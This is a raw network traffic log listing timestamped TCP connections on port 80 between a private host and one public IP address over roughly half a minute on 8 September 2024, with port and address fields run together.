                                                          Sep 8, 2024 11:55:33.714397907 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.776556015 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.776556969 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.781552076 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.781816006 CEST806494880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.786533117 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.786534071 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.786689043 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.791510105 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.897892952 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.902832031 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.906512976 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.906780005 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.911587954 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.134708881 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.143480062 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.143898964 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.259799004 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.265597105 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.265609980 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.265620947 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.455622911 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.503572941 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.589651108 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.594784975 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.634603977 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.634648085 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.728415966 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.775222063 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.854686022 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.854887962 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.855882883 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.860307932 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.860358953 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.860522032 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.860558033 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.860688925 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.860744953 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.860896111 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.865874052 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.212979078 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.217946053 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.217959881 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.217972040 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.522583961 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.574433088 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.739804029 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.790925026 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.870430946 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.870430946 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.875459909 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.875735044 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.875735044 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.875828981 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.876024961 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.880718946 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.228729963 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.234178066 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.234186888 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.234193087 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.539917946 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.587747097 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.672641039 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.712734938 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.795047045 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.795938015 CEST6495380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.800573111 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.800626040 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.800864935 CEST806495380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.800925970 CEST6495380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.801172972 CEST6495380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.806297064 CEST806495380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:37.150319099 CEST6495380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:37.155414104 CEST806495380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:37.155447006 CEST806495380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:37.155456066 CEST806495380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:37.465845108 CEST806495380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:37.514440060 CEST6495380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:37.596740007 CEST806495380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:37.650257111 CEST6495380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:37.710448980 CEST6495380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:37.711344957 CEST6495480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:37.716545105 CEST806495380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:37.716734886 CEST806495480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:37.716754913 CEST6495380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:37.716924906 CEST6495480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:37.718209982 CEST6495480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:37.724133968 CEST806495480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:38.072197914 CEST6495480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:38.077142954 CEST806495480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:38.077151060 CEST806495480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:38.077159882 CEST806495480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:38.389552116 CEST806495480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:38.431479931 CEST6495480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:38.590852022 CEST806495480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:38.634613037 CEST6495480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:38.725272894 CEST6495480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:38.726392031 CEST6495580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:38.730751038 CEST806495480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:38.730801105 CEST6495480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:38.731399059 CEST806495580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:38.731466055 CEST6495580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:38.731626987 CEST6495580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:38.752593994 CEST806495580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.087970018 CEST6495580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.094646931 CEST806495580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.094671965 CEST806495580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.094728947 CEST806495580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.424530029 CEST806495580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.468163967 CEST6495580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.560517073 CEST806495580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.604666948 CEST6495580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.604670048 CEST6495680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.609791994 CEST806495680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.610003948 CEST806495580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.614734888 CEST6495580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.614734888 CEST6495680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.614856958 CEST6495680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.621788979 CEST806495680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.693479061 CEST6495680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.696501970 CEST6495780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.701905966 CEST806495780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.702457905 CEST6495780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.706464052 CEST6495780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:39.711980104 CEST806495780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:39.741878033 CEST806495680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:40.058497906 CEST6495780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:40.063584089 CEST806495780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:40.063595057 CEST806495780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:40.063608885 CEST806495780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:40.097248077 CEST806495680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:40.103023052 CEST6495680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:40.369713068 CEST806495780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:40.418464899 CEST6495780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:40.566189051 CEST806495780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:40.618983030 CEST6495780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:40.698952913 CEST6495780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:40.699815989 CEST6495880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:40.704159021 CEST806495780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:40.704204082 CEST6495780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:40.704638004 CEST806495880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:40.704695940 CEST6495880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:40.704817057 CEST6495880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:40.709691048 CEST806495880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:41.056783915 CEST6495880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:41.061889887 CEST806495880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:41.061906099 CEST806495880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:41.061918020 CEST806495880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:41.372775078 CEST806495880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:41.415853977 CEST6495880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:41.584208012 CEST806495880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:41.590445042 CEST6495880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:41.595568895 CEST806495880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:41.596311092 CEST6495880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:41.710442066 CEST6495980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:41.715374947 CEST806495980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:41.718811989 CEST6495980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:41.718961000 CEST6495980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:41.723778009 CEST806495980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:42.074450016 CEST6495980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:42.079552889 CEST806495980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:42.079564095 CEST806495980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:42.079567909 CEST806495980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:42.407708883 CEST806495980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:42.466438055 CEST6495980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:42.612267017 CEST806495980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:42.665862083 CEST6495980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:42.740312099 CEST6495980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:42.741023064 CEST6496080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:42.745805979 CEST806495980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:42.745831013 CEST806496080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:42.745862007 CEST6495980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:42.745912075 CEST6496080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:42.746030092 CEST6496080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:42.750787973 CEST806496080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:43.103461981 CEST6496080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:43.108513117 CEST806496080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:43.108525991 CEST806496080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:43.108536005 CEST806496080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:43.411638021 CEST806496080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:43.462723970 CEST6496080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:43.621313095 CEST806496080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:43.665895939 CEST6496080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:43.740581989 CEST6496080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:43.741457939 CEST6496180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:43.745949030 CEST806496080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:43.746340990 CEST806496180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:43.746426105 CEST6496080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:43.746539116 CEST6496180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:43.747915983 CEST6496180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:43.752804995 CEST806496180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.104746103 CEST6496180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.109896898 CEST806496180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.109908104 CEST806496180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.109920025 CEST806496180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.411936045 CEST806496180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.462737083 CEST6496180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.616170883 CEST806496180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.665853024 CEST6496180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.697817087 CEST6496180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.698745012 CEST6496280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.703294992 CEST806496180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.703339100 CEST6496180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.703675032 CEST806496280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.703741074 CEST6496280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.703846931 CEST6496280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.708623886 CEST806496280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.741796970 CEST6496280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.742377043 CEST6496380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.747185946 CEST806496380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.747261047 CEST6496380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.747406006 CEST6496380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:44.752233982 CEST806496380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:44.793736935 CEST806496280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:45.103454113 CEST6496380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:45.108458042 CEST806496380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:45.108474016 CEST806496380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:45.108493090 CEST806496380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:45.175786972 CEST806496280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:45.175860882 CEST6496280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:45.426692009 CEST806496380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:45.478388071 CEST6496380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:45.624840021 CEST806496380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:45.666443110 CEST6496380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:45.741795063 CEST6496480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:45.741796017 CEST6496380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:45.746884108 CEST806496480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:45.747046947 CEST806496380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:45.747155905 CEST6496380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:45.747155905 CEST6496480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:45.747338057 CEST6496480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:45.752171993 CEST806496480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:46.105829000 CEST6496480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:46.110800982 CEST806496480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:46.110807896 CEST806496480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:46.110820055 CEST806496480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:46.415065050 CEST806496480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:46.462739944 CEST6496480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:46.643527985 CEST806496480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:46.697108030 CEST6496480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:46.757050037 CEST6496580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:46.761975050 CEST806496580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:46.762042046 CEST6496580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:46.762156963 CEST6496580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:46.767842054 CEST806496580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:47.119662046 CEST6496580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:47.129165888 CEST806496580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:47.129184008 CEST806496580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:47.129193068 CEST806496580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:47.445755005 CEST806496580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:47.494003057 CEST6496580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:47.574832916 CEST806496580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:47.619008064 CEST6496580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:47.694109917 CEST6496580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:47.694856882 CEST6496680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:47.699496031 CEST806496580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:47.699568987 CEST6496580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:47.699830055 CEST806496680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:47.699898005 CEST6496680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:47.700105906 CEST6496680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:47.704937935 CEST806496680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:48.056588888 CEST6496680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:48.061749935 CEST806496680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:48.061770916 CEST806496680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:48.061780930 CEST806496680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:48.375785112 CEST806496680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:48.478365898 CEST6496680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:48.600119114 CEST806496680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:48.681478024 CEST6496680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:48.723907948 CEST6496680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:48.724559069 CEST6496780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:48.729492903 CEST806496680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:48.729573965 CEST6496680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:48.729648113 CEST806496780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:48.729697943 CEST6496780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:48.729804039 CEST6496780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:48.734652996 CEST806496780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.087801933 CEST6496780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.092936993 CEST806496780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.092950106 CEST806496780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.092961073 CEST806496780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.420695066 CEST806496780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.540874958 CEST6496780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.556196928 CEST806496780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.648051977 CEST6496780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.678344011 CEST6496480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.679203033 CEST6496780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.679948092 CEST6496880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.684454918 CEST806496780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.684520006 CEST6496780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.685383081 CEST806496880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.685445070 CEST6496880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.685584068 CEST6496880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.695137978 CEST806496880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.744568110 CEST6496880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.745281935 CEST6496980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.750150919 CEST806496980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.750211954 CEST6496980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.750300884 CEST6496980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.755074978 CEST806496980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.793637037 CEST806496880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.868590117 CEST6497080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.873451948 CEST806497080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:49.873513937 CEST6497080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.873676062 CEST6497080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:49.878499985 CEST806497080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.103450060 CEST6496980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.109599113 CEST806496980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.109611034 CEST806496980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.170794010 CEST806496880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.170869112 CEST6496880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.228496075 CEST6497080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.233455896 CEST806497080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.233467102 CEST806497080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.233475924 CEST806497080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.415585041 CEST806496980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.541049004 CEST6496980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.545285940 CEST806497080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.548922062 CEST806496980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.673662901 CEST806497080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.674537897 CEST6497080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.743992090 CEST6496980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.786547899 CEST6496980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.786597967 CEST6497080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.790450096 CEST6497180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.792363882 CEST806496980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.792509079 CEST6496980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.792640924 CEST806497080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.792903900 CEST6497080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.796372890 CEST806497180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:50.797842979 CEST6497180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.798072100 CEST6497180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:50.802828074 CEST806497180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:51.494210005 CEST806497180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:51.540872097 CEST6497180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:59.033210039 CEST6497180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:59.038286924 CEST806497180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:59.038300991 CEST806497180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:59.038311005 CEST806497180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:59.337865114 CEST806497180.211.144.156192.168.2.4
